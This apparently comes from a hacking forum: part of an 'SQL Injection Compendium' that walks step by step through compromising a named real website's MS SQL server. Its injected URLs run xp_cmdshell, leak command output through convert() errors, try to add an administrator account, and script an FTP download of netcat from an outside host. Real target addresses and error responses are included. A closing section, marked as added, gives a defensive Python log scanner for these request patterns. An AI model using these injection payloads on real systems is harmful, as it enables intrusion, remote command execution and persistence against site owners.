Anken - SQL Injection Compendium (Part 7) - Y!m: This_Love_No1
SQL Injection Compendium (Part 7)
DETERMINING THE SERVER'S IP
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == "%")
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840
RECONNAISSANCE OF IP "203.162.7.70"
C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
• 203.162.7.70 == panvietnam.com
DIRECT FTP - FAILED!
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye
UPLOADING NETCAT TO THE SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
VERIFYING WHETHER NETCAT WAS UPLOADED SUCCESSFULLY
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))-
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840
fantomas311(VNISS)
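An added defensive example, not part of the original article: a Python scan of web-server log lines for the request shapes shown above (statements stacked after `id=`, `xp_cmdshell`, `openrowset(`, and the `convert(int,(select ...))` error-based read). The log layout, client addresses, timestamps, placeholder values and rule names are constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are this example's own; each regex matches a request shape from the article.
RULES = {
    "stacked_statement": re.compile(r";\s*(drop|create|insert|select|exec)\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "openrowset": re.compile(r"\bopenrowset\s*\(", re.I),
    "convert_error_leak": re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
}

# Constructed sample log (assumed fields: date time c-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
2003-01-01 10:00:00 192.0.2.10 GET /FullStory.asp id=1 200
2003-01-01 10:00:09 192.0.2.66 GET /FullStory.asp id=1;drop+table+t+create+table+t(a+int+identity,b+varchar(1000))+insert+into+t+exec+master..xp_cmdshell+'ipconfig'-- 200
2003-01-01 10:00:15 192.0.2.66 GET /FullStory.asp id=1+and+1=convert(int,(select+top+1+b+from+t+where+b+like+'%25IP+Address%25'))-- 500
2003-01-01 10:01:40 192.0.2.66 GET /FullStory.asp id=1;select+*+from+openrowset('sqloledb','server=HOST;uid=USER;pwd=','set+fmtonly+off+select+1+exec+xp%5Fcmdshell+"dir"')-- 200
"""

def decode(query):
    """URL-decode up to twice so double-encoded keywords (xp%255Fcmdshell) still match."""
    for _ in range(2):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def scan(log_text):
    """Return [(client_ip, [rule names])] for every request that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # skip header/comment lines and anything not in the assumed layout
        client_ip, query = fields[2], decode(fields[5])
        matched = [name for name, rx in RULES.items() if rx.search(query)]
        if matched:
            hits.append((client_ip, matched))
    return hits

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG):
        print(ip, ",".join(rules))
```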